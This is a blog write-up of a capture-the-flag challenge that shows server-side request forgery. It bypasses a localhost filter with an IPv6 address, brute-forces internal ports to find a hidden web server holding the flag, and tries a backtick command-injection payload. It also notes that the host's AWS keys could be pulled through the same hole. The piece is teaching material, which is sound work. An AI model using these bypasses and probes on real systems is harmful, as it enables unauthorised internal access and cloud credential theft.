SSRF Internal resource accessing & Bypassing Filter (CTF)

Hello Everyone, Hope you are doing well.

Myself Basavaraj here are my old blogs or writeups if you wanna check those click here

Today I am gonna show how an Server side request forgery vulnerability allows to access internal resources .

Before starting I will share some resources which I use often while testing for SSRF and best for learning SSRF ,

intext:”server side request forgery” site:hackerone.com

intext:”server side request forgery” site:medium.com

intext:”server side request forgery” site:github.com

(Here you can see cool SSRF writeups)

Still there are many useful resources but you can find those all online

Lets start, This CTF held by metactf and the challenge is still live.

the challenge

here you can access the challenge challenge

Homepage of the URL

Now I used my burp collaborator URL and click on browse and it showed me content of that URL & made http request to my burp collaborator URL

response of the burp collaborator url
HTTP interaction

By Using SSRF you can able to escalate it to RCE also(For newbies), Now here I tried by injecting a command in burp URL but didn’t worked

i.e http://burp.url?`whoami`

Used file protocol and many more but everything is blocked

Request blocked because only http & https supported

Now I have to use http or https because in challenge description they have clearly mentioned they are using webserver to hide flag, Now here I tried accessing http://localhost or http://127.0.0.1 and tried by using https also but response is blocked.

Here you can find some awesome checklist for bypassing filters in ssrf , Now I tried http://[::]:80/ Now I got response like this

This means there is a same webserver running on localhost 80 port and front end also

Now we have successfully bypassed filter, Now the next step is to find another webserver running on internal and there we can find the flag, Now I just changed port number 80 to 79 I didn’t get any response (It seems port is closed), Now I captured the request and sent it to intruder and brute forced the ports from 1- 10000 I Got one port open i.e 7349

intruder
Got the open port 7349

And here we got the flag by that open port

Final Flag

And also this challenge is hosted on AWS ec2, due to that we can able to extract AWS keys also I don’t know it may be mistake of ctf devs they have not enabled any filters for that.

Thank you all ….

Instagram : https://www.instagram.com/basu_banakar

Twitter: https://twitter.com/basu_banakar

website : https://basubanakar.com/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store